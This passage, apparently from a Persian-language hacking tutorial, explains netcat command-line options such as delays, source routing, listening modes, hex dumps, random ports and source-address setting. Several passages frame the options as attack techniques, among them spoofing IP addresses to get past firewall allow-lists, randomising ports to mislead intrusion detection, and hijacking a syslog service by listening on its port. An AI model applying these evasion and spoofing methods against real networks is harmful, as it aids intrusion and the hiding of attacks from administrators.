ایﻦ ﮔﺰیﻨﻪ ﻣﺸﺨﺺ ﮐﻨﻨﺪﻩ ﺕﺎﺧﻴﺮی اﺱﺖ ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﻣﺎﺏﻴﻦ دو ﻓﺮایﻨﺪ ارﺱﺎل ﻣﺘﻮاﻟﯽ دادﻩ هﺎ ﻣﻨﻈﻮر ﻣﻴﮑﻨﺪ. ﺏﺮای ﻣﺜﺎل هﻨﮕﺎم اﻧﺘﻘﺎل اﻃﻼﻋﺎت یﮏ ﻓﺎیﻞ ﺏﻪ ﺏﺮﻧﺎﻣﻪ ، NCایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ اﻧﺪازﻩ زﻣﺎﻧﯽ ﮐﻪ ﺕﻮﺱﻂ ﺁرﮔﻮﻣﺎن ﻓﻮق ﻣﺸﺨﺺ ﻣﻴﺸﻮد ،ﭘﻴﺶ از دریﺎﻓﺖ ﺧﻂ ﺏﻌﺪی از ورودی ﺕﺎﺧﻴﺮ ایﺠﺎد ﻣﻴﮑﻨﺪ .اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ NCﺏﺮ روی ﭼﻨﺪن ﭘﻮرت از یﮏ رایﺎﻧﻪ ﻣﻴﺰﺏﺎن ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻴﺶ از ارﺕﺒﺎط ﺏﺎ ﭘﻮرت ﺏﻌﺪی ﺏﻪ اﻧﺪازﻩ ﺕﻌﻴﻴﻦ ﺷﺪﻩ ﺕﻮﺱﻂ ﺁرﮔﻮﻣﺎن ﻣﻮرد ﺏﺤﺚ ﺙﺎﻧﻴﻪ ﺕﺎﺧﻴﺮ ایﺠﺎد ﮐﻨﺪ .ایﻦ ﻗﺎﺏﻠﻴﺖ ﺏﻪ ﮐﺎرﺏﺮ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﻓﺮایﻨﺪ اﻧﺘﻘﺎل دادﻩ هﺎ و یﺎ ﺡﻤﻼت اﺡﺘﻤﺎﻟﯽ ﺏﺮ روی یﮏ ﺱﺮویﺲ ﻣﻮﺟﺪ را ﺏﺎ وﺽﻮح ﺏﻴﺸﺘﺮی ﻣﺸﺎهﺪﻩ ﮐﺮدﻩ ،ﺽﻤﻦ ایﻨﮑﻪ اﻣﮑﺎن ﻣﺮاﻗﺒﺖ از ﭘﻮرت هﺎ را ﺕﺤﺖ یﮏ ﻧﻮع ﺱﻴﺴﺘﻢ ﺕﺸﺨﻴﺺ ﺕﺠﺎوز یﺎ اﺻﻄﻼﺡﺎ ، IDSدر اﺧﺘﻴﺎر ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ﻗﺮار ﻣﯽ دهﺪ. اﺱﺘﻔﺎدﻩ از ایﻦ زیﻨﻪ ﻣﻴﺘﻮاﻧﺪ ﮔﻮل زﻧﻨﺪﻩ ﺏﺎﺷﺪ !! در واﻗﻊ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺷﻴﻮﻩ ﺱﻔﺖ ﺱﺨﺘﯽ را ﺏﺮای ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﻗﺮار ﻧﻤﻴﺪهﺪ ) ایﻦ ﻣﻮﺽﻊ را ﺏﻪ زودی در ﻗﺴﻤﺘﯽ ﺏﺎ ﻋﻨﻮان ﺟﻌﻞ ﺁدرس IPیﺎ هﻤﺎن IP Spoofingﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ( .ﺏﻬﺮﻩ ﮔﻴﺮی از ﺕﻌﺪاد ﺡﺪاﮐﺜﺮ ٨ﮔﺰیﻨﻪ –gدر ﺱﻄﺮ ﻓﺮﻣﺎن ﺏﻪ ﻣﻨﻈﻮر اﺟﺒﺎر در ﻋﺒﻮر دادﻩ هﺎ از ﺁدرس IPﻣﺸﺨﺺ ﻣﺠﺎز ﻣﻴﺒﺎﺷﺪ .ایﻦ ﻗﺎﺏﻠﻴﺖ در ﻣﻮاردی ﮐﻪ ﺟﻌﻞ ﺁدرس IPﻣﻨﺒﻊ دادﻩ هﺎ ) ﺟﻬﺖ دور زدن ﻓﻴﻠﺘﺮهﺎ دیﻮار ﺁﺕﺶ یﺎ ﻟﻴﺴﺖ ﺁدرس هﺎی ﻣﺠﺎز ﺏﺮای دﺱﺖ یﺎﺏﯽ ( ﻣﺪ ﻧﻈﺮ ﺏﻮدﻩ و ﻣﺎیﻞ ﺏﻪ دریﺎﻓﺖ ﭘﺎﺱﺦ از ﺟﺎﻧﺐ رایﺎﻧﻪ ﻣﻴﺰﺏﺎن ﺏﺎﺷﻴﻢ ،ﻣﻔﻴﺪ واﻗﻊ ﻣﻴﺸﻮد .ﺏﻪ واﺱﻄﻪ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ از ﻃﺮیﻖ ﮐﺎﻣﭙﻴﻮﺕﺮ ﺕﺤﺖ ﮐﻨﺘﺮل ﺧﻮد ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺴﺘﻪ هﺎی IPرا ﻣﺠﺒﻮر ﮐﻨﻴﻢ ﺕﺎ ﺏﻪ ﺟﺎی اﻧﺘﻘﺎل ﺏﻪ ﻣﻘﺼﺪ واﻗﻌﯽ ﺧﻮد ﺏﻪ ﺁدرس ﻣﻮرد ﻧﻈﺮ ﻣﺎ ﺟﺎری ﺷﻮﻧﺪ .ﺏﺎ ایﻦ هﻤﻪ ﺕﻮﺟﻪ ﺏﻪ ایﻦ ﻣﻮﺽﻮع ﻣﻬﻢ اﺱﺖ ﮐﻪ ایﻦ ﻓﺮایﻨﺪ در اﻏﻠﺐ ﻣﻮارد ﻏﻴﺮ ﻋﻤﻠﯽ اﺱﺖ ﭼﺮا ﮐﻪ ﺏﻴﺸﺘﺮ روﺕﺮهﺎ اﻣﺮوزی ﮔﺰیﻨﻪ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻮرد ﺏﺤﺚ را ﻧﺎدیﺪﻩ ﮔﺮﻓﺘﻪ ﺽﻤﻦ ﺁﻧﮑﻪ ﺏﻴﺸﺘﺮ ﻓﻴﻠﺘﺮهﺎی ﻧﺼﺐ ﺷﺪﻩ ﺏﺮ روی ﭘﻮرت هﺎی و هﻤﭽﻨﻴﻦ اﻏﻠﺐ دیﻮارهﺎی اﺕﺶ هﺮﮔﻮﻧﻪ اﻗﺪاﻣﯽ را ﺟﻬﺖ اﻧﺠﺎم ایﻦ ار ﺏﻪ ﺙﺒﺖ ﻣﻴﺮﺱﺎﻧﻨﺪ. از ایﻦ ﮔﺰیﻨﻪ هﻨﮕﺎﻣﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ ﺧﻮاﺱﺘﻪ ﺏﺎﺷﻴﻢ ﺕﺎ ﺁدرس IPﺏﻪ ﺧﺼﻮﺻﯽ را در ﻟﻴﺴﺖ ﺕﻌﻴﻴﻦ ﺷﺪﻩ ﺕﻮﺱﻂ ﮔﺰیﻨﻪ –gﺏﻪ ﻋﻨﻮان ﺁدرس ﺏﻌﺪی ﻣﺸﺨﺺ ﮐﻨﻴﻢ .ﺏﻪ دﻟﻴﻞ ﻣﺎهﻴﺖ ﭼﻬﺎر ﺏﺎیﺘﯽ ﺁدرس هﺎی IPایﻦ ﺁرﮔﻮﻣﺎن هﻤﻮارﻩ ﺏﻪ ﺷﮑﻞ ﻣﻀﺮب هﺎی از ﻋﺪد ۴ﻇﺎهﺮ ﻣﻴﺸﻮد .ﺏﻪ ﮔﻮﻧﻪ ای ﮐﻪ ﻋﺪد ۴ﺏﻪ اوﻟﻴﻦ ﺁدرس IPو ﻋﺪد ٨ﺏﻪ دوﻣﻴﻦ ﺁدرس IPدر ﻟﻴﺴﺖ اﺷﺎرﻩ ﻣﻴﮑﻨﺪ و ﺏﺮای ﺱﺎیﺮ ﺁدرس هﺎ هﻢ ﺏﻪ هﻤﻴﻦ ﺕﺮﺕﻴﺐ اداﻣﻪ ﭘﻴﺪا ﻣﻴﮑﻨﺪ .ایﻦ ﻗﺎﺏﻠﻴﺖ ﺏﺮای ﻣﻮاردی ﻣﻔﻴﺪ اﺱﺖ ﮐﻪ ﺏﺨﻮاهﻴﻢ ﮐﻪ ﺏﺨﺸﻬﺎی از ﻟﻴﺴﺖ ﺁدرس هﺎی IPرا ﺏﻪ ﮔﻮﻧﻪ ای ﺟﻌﻞ ﮐﻨﻴﻢ ﮐﻪ ﺏﻪ ﻧﻈﺮ ﺁیﺪ ایﻦ ﺁدرﺱﻬﺎ از ﺟﺎی دیﮕﺮی ﺕﻌﻴﻴﻦ ﺷﺪﻩ اﻧﺪ .ﺏﻪ ایﻦ ﺕﺮﺕﻴﺐ ﮐﻪ ﺏﺎ ﻗﺮار دادن ﺁدرس هﺎی IPﺟﻌﻠﯽ در اوﻟﻴﻦ دو ﮔﺰیﻨﻪ – gاز ﻟﻴﺴﺖ ﺁدرس هﺎی IPو اﺱﺘﻔﺎدﻩ از ﻋﺪد ١٢ﺏﻪ ﻋﻨﻮان ﺁرﮔﻮﻣﺎن ﮔﺰیﻨﻪ –Gﻣﻴﺘﻮان ﺕﺮﺕﻴﺒﯽ داد ﺕﺎ ﺏﺴﺘﻪ هﺎی IPﻣﺮﺏﻮﻃﻪ ﻣﺴﺘﻘﻴﻤﺎ ﺏﻪ ﺱﻮﻣﻴﻦ ﺁدرس IPﻣﻮﺟﺪ در ﻟﻴﺴﺖ ﻣﺴﻴﺮهﺎ ﺱﺮازیﺮ ﺷﻮد .ﺏﺎ ایﻦ ﺡﺎل ﻣﺤﺘﻮای اﺻﻠﯽ ﺏﺴﺘﻪ هﺎ ﮐﻤﺎﮐﺎن ﺷﺎﻣﻞ ﺁدرس هﺎی ﺟﻌﻠﯽ ﺧﻮاهﺪ ﺏﻮد .از ایﻦ رو ﭼﻨﻴﻦ ﺏﻪ ﻧﻈﺮ ﺧﻮاهﺪ رﺱﻴﺪ ﮐﻪ ﺏﺴﺘﻪ ﻣﻮرد ﻧﻈﺮ از ﻣﻮﻗﻌﻴﺖ ﻃﺒﻴﻌﯽ ﺧﻮد ﺏﻪ ﻣﻘﺼﺪ ارﺱﺎل ﺷﺪﻩ ،درﺡﺎﻟﯽ ﮐﻪ ﻓﺮایﻨﺪ ارﺱﺎل از ﻣﻮﻗﻌﻴﺖ ﻣﺘﻔﺎوﺕﯽ اﻧﺠﺎم ﺷﺪﻩ اﺱﺖ .ایﻦ ﻗﺎﺏﻠﻴﺖ ﻣﻴﺘﻮاﻧﺪ هﻨﮕﺎم ﺟﻌﻞ ﺁدرس IPﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ ﻣﻔﻴﺪ واﻗﻊ ﺷﻮد ،اﻣﺎ هﻴﭻ ﺕﻀﻤﻴﻨﯽ در ﻣﻮرد دریﺎﻓﺖ ﭘﺎﺱﺦ از ﺟﺎﻧﺐ ﻣﻴﺰﺏﺎن در دﺱﺖ ﻧﺨﻮاهﺪ ﺏﻮد ،ﭼﺮا ﮐﻪ ﻣﻴﺰﺏﺎن ﻣﻮرد ﻧﻈﺮ ﺱﻌﯽ ﺧﻮاهﺪ داﺷﺖ ﺕﺎ ﻣﺴﻴﺮ را از ان ﭼﻪ ﮐﻪ ﺁدرس IPﺟﻌﻞ ﺷﺪﻩ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ،ﻣﻨﺤﺮف ﻧﻤﺎیﺪ . ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻓﻌﺎل یﺎ ﻏﻴﺮ ﻓﻌﺎل ﺷﺪن ﺡﺎﻟﺖ ﮔﻮش ﺏﻪ زﻧﮓ یﺎ Listening modeدر ﺏﺮﻧﺎﻣﻪ NCﻣﻴﺸﻮد. ﮔﺰیﻨﻪ ﻓﻮق ﺏﺎیﺪ ﺏﻪ هﻤﺮاﻩ ﮔﺰیﻨﻪ –pﺏﺮای ﺕﻌﻴﻴﻦ ﭘﻮرت TCPﻣﻮرد ﻧﻈﺮ ﺏﻪ ﻣﻨﻈﻮر اﻧﻈﺎر ﺏﺮﻧﺎﻣﻪ NCﺟﻬﺖ ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺮ روی ﺁن ﭘﻮرت ﻣﻮر اﺱﺘﻔﺎدﻩ ﻗﺮار ﺏﮕﻴﺮد .ﺏﺮای ﺏﻬﺮﻩ ﮔﻴﺮی از ﭘﻮرت هﺎی UDPﺏﻪ ﺟﺎی TCPﮐﺎﻓﯽ اﺱﺖ ﺏﻪ ﺟﺎی ﮔﺰیﻨﻪ –pاز –uاﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ. ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ در ﺱﻴﺴﺘﻢ هﺎی ﻧﻮع ویﻨﺪوز ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ ﺏﻮدﻩ و ﻧﺴﺒﺖ ﺏﻪ ﮔﺰیﻨﻪ ﻗﺒﻠﯽ یﻌﻨﯽ ﮔﺰیﻨﻪ –Lاز ﻗﺎﺏﻠﻴﺖ ﺏﻴﺸﺘﺮی ﺏﺮﺧﻮردار اﺱﺖ .ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ ﺏﺮﻧﺎﻣﻪ NCرا ﻣﺠﺒﻮر ﻣﻴﮑﻨﺪ ﺕﺎ ﭘﺲ از ﺏﺴﺘﻦ یﮏ اﺕﺼﺎل ،اﻗﺪاﻣﯽ را ﺟﻬﺖ ﺕﻐﻴﻴﺮ ﺡﺎﻟﺖ ﻣﺠﺪد ﮔﻮش ﺏﻪ زﻧﮓ ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ ﺱﻄﺮ ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ اﻧﺠﺎم دهﺪ .ﺏﻪ ﺕﺮﺕﻴﺐ Tﺏﺮﻧﺎﻣﻪ NCﻣﻴﺘﻮاﻧﺪ در ﺧﻮاﺱﺖ ﺏﻌﺪی ﺟﻬﺖ اﺕﺼﺎل را ﺏﺪون دﺧﺎﻟﺖ ﮐﺎرﺏﺮ و ﺡﺘﯽ ﭘﺲ از ﺁن ﮐﻪ ﻓﺮﺁیﻨﺪ اﺕﺼﺎل اوﻟﻴﻪ ﺏﻪ اﺕﻤﺎم رﺱﻴﺪﻩ و ﺏﺴﺘﻪ ﺷﺪﻩ اﺱﺖ ،ﺏﭙﺬیﺮد .ﻣﺸﺎﺏﻪ ﮔﺰیﻨﻪ –lﺏﻬﺮﻩ ﮔﻴﺮی از ایﻦ ﮔﺰیﻨﻪ ﻣﺴﺘﻠﺰم اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ –pیﺎ –uﻣﻴﺒﺎﺷﺪ. اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺮﻧﺎﻣﻪ NCرا از هﺮﮔﻮﻧﻪ ﮐﻮﺷﺸﯽ ﺏﻪ ﻣﻨﻈﻮر دﺱﺘﻴﺎﺏﯽ ﺏﻪ ﻧﺎم ﻣﻴﺰﺏﺎن ﻣﻨﻊ ﻣﻴﮑﻨﺪ .هﻨﮕﺎﻣﻪ اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ ﻣﺬﮐﻮر اﻃﻤﻴﻨﺎن ﺡﺎﺻﻞ ﮐﻨﻴﺪ ﮐﻪ ﻧﺎم هﻴﭻ ﻣﻴﺰﺏﺎﻧﯽ را ﺏﻪ ﻋﻨﻮان ﺁرﮔﻮﻣﺎن ﺱﻄﺮ ﻓﺮﻣﺎن ﻣﻮرد ﺏﻬﺮﻩ ﺏﺮداری ﻗﺮار ﻧﺪادﻩ ایﺪ. اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﺕﺎ دادﻩ هﺎ ﺏﻪ ﺻﻮرت هﮕﺰادﺱﻴﻤﺎل یﺎ ﻣﺒﻨﺎی ﺷﺎﻧﺰدﻩ در ﻓﺎیﻠﯽ ﺏﺎ ﻣﺸﺨﺼﻪ lehexfiذﺧﻴﺮﻩ ﺷﻮد .ﻓﺮﻣﺎن nc -o hexfileهﻢ دادﻩ هﺎی ورودی هﻢ دادﻩ هﺎی ﺧﺮوﺟﯽ را ﺏﻪ ﺻﻮرت هﮕﺰادﺱﻴﻤﺎل ذﺧﻴﺮﻩ ﻣﻴﮑﻨﺪ .در ﻓﺎیﻞ ﺡﺎﺻﻞ ﻋﻼﻣﺖ < و > ﺏﻪ ﺕﺮﺕﻴﺐ ﺏﻴﺎﻧﮕﺮ دادﻩ هﺎی ورودی و ﺧﺮوﺟﯽ ﺧﻮاهﻨﺪ ﺏﻮد .ﺏﺮای ایﻨﮑﻪ ﻋﻤﻠﻴﺎت ﺡﺎﺻﻞ از ﺏﻪ ﮐﺎر ﮔﻴﺮی ایﻦ ﮔﺰیﻨﻪ ﺕﻨﻬﺎ ﺏﺮ روی دادﻩ ورودی اﻧﺠﺎم ﺷﻮد ﮐﺎﻓﯽ اﺱﺖ ﻓﺮﻣﺎن ﻓﻮق را ﺏﻪ ﺻﻮرت nc –o < hexfileﺕﻐﻴﻴﺮ دهﻴﺪ .ﺏﻪ ﻃﻮر ﻣﺸﺎﺏﻪ ﻓﺮﻣﺎن nc –o > hexfileﻋﻤﻠﻴﺎت ﻣﻮرد ﻧﻈﺮ را ﺕﻨﻬﺎ ﺏﺮ روی دادﻩ هﺎی ﺧﺮوﺟﯽ اﻧﺠﺎم ﻣﻴﺪهﺪ. ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ایﻦ ﮔﺰیﻨﻪ ﻣﻴﺘﻮان ﺷﻤﺎرﻩ ﭘﻮرت ﻣﺤﻠﯽ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﺏﺮﻧﺎﻣﻪ NCرا ﻣﺸﺨﺺ ﻧﻤﻮد .ﺏﻪ ﮐﺎرﮔﻴﺮی ایﻦ ﮔﺰیﻨﻪ هﻨﮕﺎم اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ –lیﺎ –Lﺟﻬﺖ ﺕﺤﺼﻴﻞ ﮔﻮش ﺏﻪ زﻧﮓ اﻣﺮی ﺽﺮری اﺱﺖ .در ﺻﻮرﺕﯽ ﮐﻪ
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
١١
-r
١٢
-s
١٣
-t
١۴
-u
١۵
-v
١۶
>-w<seconds
١٧
-z
ﺻﻔﺤﻪ
٦٨
از ﮔﺰیﻨﻪ ﻣﻮرد ﺏﺤﺚ اﺱﺘﻔﺎدﻩ ﻧﺸﻮد NCاز هﺮ ﭘﻮرﺕﯽ ﮐﻪ ﺱﻴﺴﺘﻢ ﺏﻪ ﺁن اﺧﺘﺼﺎص ﺏﺪهﺪ اﺱﺘﻔﺎدﻩ ﺧﻮاهﺪ ﮐﺮد ) ایﻦ وﺽﻌﻴﺖ ﭼﻴﺰی اﺱﺖ ﮐﻪ در ﻣﻮرد ﺏﻴﺸﺘﺮ ﺏﺮﻧﺎﻣﻪ هﺎی ﮐﺎرﺏﺮدی TCPیﺎ UDPﺷﺎهﺪ ﺁن هﺴﺘﻴﻢ ( .ﺏﻪ ﺧﺎﻃﺮ داﺷﺘﻪ ﺏﺎﺷﻴﺪ ﮐﻪ در ﺱﻴﺴﺘﻢ ﻧﻮع یﻮﻧﻴﮑﺲ ﺕﻨﻬﺎ ﮐﺎرﺏﺮ اﺻﻠﯽ ﻣﻮﺱﻮم ﺏﻪ rootﻗﺎدر ﺏﻪ اﺱﺘﻔﺎدﻩ از ﭘﻮرت هﺎی ﮐﻮﭼﮑﺘﺮ از ١٠٢۴اﺱﺖ. ﺏﺮﻧﺎﻣﻪ ncﭘﻮرت هﺎی ﻣﺤﻠﯽ و ﭘﻮرت هﺎی راﻩ دور یﺎ ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ﭘﻮرت هﺎی ﻣﺒﺪا و ﻣﻘﺼﺪ را ﺏﻪ ﺻﻮرت ﺕﺼﺎدﻓﯽ اﻧﺘﺨﺎب ﻣﻴﮑﻨﺪ .ایﻦ ﻗﺎﺏﻠﻴﺖ در ﻣﻮاﻗﻌﯽ ﻣﻔﻴﺪ واﻗﻊ ﻣﻴﺸﻮد ﮐﻪ ﺏﺨﻮاهﻴﻢ ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺏﺮﻧﺎﻣﻪ اﻃﻼﻋﺎﺕﯽ را درﺏﺎرﻩ ﻣﺤﺪودﻩ ﺏﺰرﮔﯽ از ﭘﻮرت هﺎی ﻣﻮﺟﺪ ﺏﺮ روی ﺱﻴﺴﺘﻢ ﺏﻪ دﺱﺖ ﺁوردﻩ و ﺕﺮﺕﻴﺒﯽ ﻧﺎﻣﺸﺨﺺ از ﭘﻮرت هﺎی ﻣﺒﺪا و ﻣﻘﺼﺪ را ﻣﻮرد ﺏﻬﺮﻩ ﺏﺮداری ﻗﺮار دهﻴﻢ .ایﻦ ﻓﻌﺎﻟﻴﺖ ﺏﻪ ﻓﺮایﻨﺪ ﭘﻴﻤﺎیﺶ یﺎ اﺱﮑﻦ ﭘﻮرت هﺎی ﻣﻮﺟﻮد ﺕﻮﺱﻂ ﺏﺮﻧﺎﻣﻪ NCﺕﺸﺎﺏﻪ ﮐﻤﯽ داﺷﺘﻪ و ﺏﺪیﻦ ﺕﺮﺕﻴﺐ ﺱﻴﺴﺘﻢ هﺎی ردیﺎﺏﯽ را در ﭘﻴﮕﻴﺮی ﻓﻌﺎﻟﻴﺖ هﺎی NCﮔﻤﺮاﻩ ﺧﻮاهﺪ ﮐﺮد .ﭼﻨﺎن ﭼﻪ از ایﻦ ﮔﺰیﻨﻪ ﺏﻪ هﻤﺮاﻩ ﮔﺰیﻨﻪ –iﺏﺎ یﮏ ﺕﺎﺧﻴﺮ ﺕﻘﺮیﺒﺎ ﻃﻮﻻﻧﯽ اﺱﺘﻔﺎدﻩ ﺷﻮد ،ان ﮔﺎﻩ ﻓﺮایﻨﺪ اﻧﺘﺨﺎب ﭘﻮرت هﺎ ﺕﺸﺎﺏﻪ ﮐﻤﺘﺮی ﺏﺎ اﺱﮑﻦ ﺁن هﺎ ﺧﻮاهﺪ داﺷﺖ ،ﺏﺎ وﺟﻮد ایﻦ یﮏ ﻣﺪیﺮ ﺱﻴﺴﺘﻢ ﺏﺎهﻮش ﺏﺎ ﮐﻤﯽ دﻗﺖ و ﺡﻮﺻﻠﻪ در وﻗﺎیﻊ ﺙﺒﺖ ﺷﺪﻩ ﺕﻮﺱﻂ ﺱﻴﺴﺘﻢ هﻤﻮارﻩ ﻣﯽ ﺕﻮاﻧﺪ ﺏﻪ ﻣﻮﺽﻮع ﻓﻮق ﭘﯽ ﺏﺒﺮد. ایﻦ ﮔﺰیﻨﻪ ﺁدرس IPﻣﻨﺒﻌﯽ را ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﺏﺎیﺪ هﻨﮕﺎم ﺏﺮﻗﺮاری ارﺕﺒﺎﻃﺎت ﺧﻮد از ﺁن هﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ ﻣﺸﺨﺺ ﻣﯽ ﻧﻤﺎیﺪ .ﮔﺰیﻨﻪ ﻓﻮق ﺏﻪ ﻣﻬﺎﺟﻤﻴﻦ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﺕﺎ ﺡﻘﻪ هﺎیﯽ را ﺏﻪ دور از ﭼﺸﻤﺎن ﻣﺪیﺮان ﺱﻴﺴﺘﻢ ﺱﻮار ﮐﻨﻨﺪ .ﭘﻴﺶ از هﺮ ﭼﻴﺰ ایﻦ ﮔﺰیﻨﻪ اﻣﮑﺎن ﭘﻨﻬﺎن ﮐﺮدن ﺁدرس IPﻣﻬﺎﺟﻤﻴﻦ یﺎ ﺟﻌﻞ ﺁدرس IPدیﮕﺮان را در اﺧﺘﻴﺎر ﺁﻧﻬﺎ ﻗﺮار ﻣﯽ دهﺪ .در ﺻﻮرت ﺟﻌﻞ ﺁدرس ﻣﻬﺎﺟﻢ ﻣﻮرد ﻧﻈﺮ ﺏﺮای دﺱﺖ یﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت ارﺱﺎﻟﯽ ﺏﻪ ﺁدرس ﻣﻮرد اﺱﺘﻔﺎدﻩ وی ﺏﺎیﺪ از ﮔﺰیﻨﻪ –gﺟﻬﺖ ﻣﺴﻴﺮ یﺎﺏﯽ ﻣﻨﺒﻊ ﺏﻬﺮﻩ ﺏﮕﻴﺮد .ﻧﮑﺘﻪ ﺏﻌﺪی ایﻦ اﺱﺖ ﮐﻪ در ﺏﺴﻴﺎری از ﻣﻮارد در ﺡﺎﻟﺖ ﮔﻮش ﺏﻪ زﻧﮓ ﻣﯽ ﺕﻮان اﻗﺪام ﺏﻪ رﺏﻮدن ﺱﺮویﺲ ﮐﺮد .هﻤﺎن ﮔﻮﻧﻪ ﮐﻪ ﻣﻴﺪاﻧﻴﺪ ﺕﻤﺎم ﺱﺮویﺲ هﺎی TCPیﺎ UDP از ﻃﺮیﻖ ﭘﻮرت ﻣﺸﺨﺼﯽ ﻗﺎﺏﻞ دﺱﺘﻴﺎﺏﯽ هﺴﺘﻨﺪ .ﺏﺮای ﻣﺜﺎل ﺱﺮویﺲ SYSLOGﺏﺮ روی ﭘﻮرت UDPﺷﻤﺎرﻩ ۵١۴ﺟﻬﺖ دریﺎﻓﺖ دادﻩ هﺎ ﻣﻮرد ﻧﻈﺮ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ اﺱﺖ .ﺏﺎ ایﻦ وﺟﺪ در ﺻﻮرت اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ NCﺏﻪ ﻣﻨﻈﻮر ﮔﻮش ﻓﺮا دادن ﺏﻪ ﭘﻮرت ﺷﻤﺎرﻩ ۵١۴و ﻧﻴﺰ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ –sﺟﻬﺖ ﺕﻌﻴﻴﻦ ﺁدرس IPﻣﻨﺒﻊ هﺮ ﮔﻮﻧﻪ اﻃﻼﻋﺎت ارﺱﺎﻟﯽ ﺏﻪ ﺁدرس IPﻣﺬﮐﻮر اﺏﺘﺪا در اﺧﺘﻴﺎر ﺏﺮﻧﺎﻣﻪ NCﻗﺮار ﺧﻮاهﺪ ﮔﺮﻓﺖ . در ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﮔﺰیﻨﻪ TELNETﮐﺎﻣﭙﺎیﻞ ﺷﺪﻩ ﺏﺎﺷﺪ اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ اﻣﮑﺎن ﻣﻴﺪهﺪ ﺕﺎ ﺏﺮﻧﺎﻣﻪ NCﺏﺎ ﺱﺮور Telnetﺏﻪ ﮔﻔﺘﮕﻮ ﺏﻨﺸﻴﻨﺪ .هﺮﭼﻨﺪ ﻣﻤﮑﻦ اﺱﺖ اﻃﻼﻋﺎت رد ﺏﺪل ﺷﺪﻩ ﺏﻪ اﻧﺪازﻩ ﮐﺎﻓﯽ ﺏﺎ ﻣﻔﻬﻮم ﺏﻪ ﻧﻈﺮ ﻧﺮﺱﺪ اﻣﺎ ﺕﻼش ﺏﺮای اﺕﺼﺎل ﺏﻪ ﭘﻮرت TCPﺷﻤﺎرﻩ ٢٣ﮐﻪ ﭘﻮرت ﻣﺘﺪاول ﺟﻬﺖ اﺕﺼﺎل ﺏﻪ ﺱﺮور Telnetﻣﯽ ﺏﺎﺷﺪ ،ﻣﻮﺟﺐ ﺧﻮاهﺪ ﺷﺪ ﺕﺎ اﻋﻼن اﺕﺼﺎل ﺏﻪ ﺏﺮﻧﺎﻣﻪ Telnetﺏﺮ روی ﺻﻔﺤﻪ ﻇﺎهﺮ ﺷﻮد. ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ NCﺏﻪ ﺟﺎی اﺱﺘﻔﺎدﻩ از ﭘﺮوﺕﮑﻞ TCPاز ﭘﺮوﺕﮑﻞ UDPﺏﻬﺮﻩ ﮔﻴﺮد .از ایﻦ ﮔﺰیﻨﻪ ﻣﻴﺘﻮان هﻢ در ﺡﺎﻟﺖ ﮐﻼیﻨﺖ و یﺎ ﺱﺮور ﺏﻬﺮﻩ ﺏﺮد. ایﻦ ﮔﺰیﻨﻪ ﻣﻴﺰان اﻃﻼﻋﺎﺕﯽ را ﮐﻪ ﺏﺮﻧﺎﻣﻪ NCﺏﺎیﺪ در ﻓﻌﺎﻟﻴﺖ ﺧﻮد ﺏﻪ ﮐﺎرﺏﺮ ﮔﺰارش ﺏﺪهﺪ ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ .ﻋﺪم اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﻣﻮﺟﺐ ﻣﻴﺸﻮد ﺕﺎ NCهﻴﭻ اﻃﻼﻋﺎﺕﯽ در ﻣﻮرد روﻧﺪ ﮐﺎر ﺧﻮد در اﺧﺘﻴﺎر ﮐﺎرﺏﺮ ﻗﺮار ﻧﺪهﺪ. از ﻃﺮف دیﮕﺮ اﺱﺘﻔﺎدﻩ از 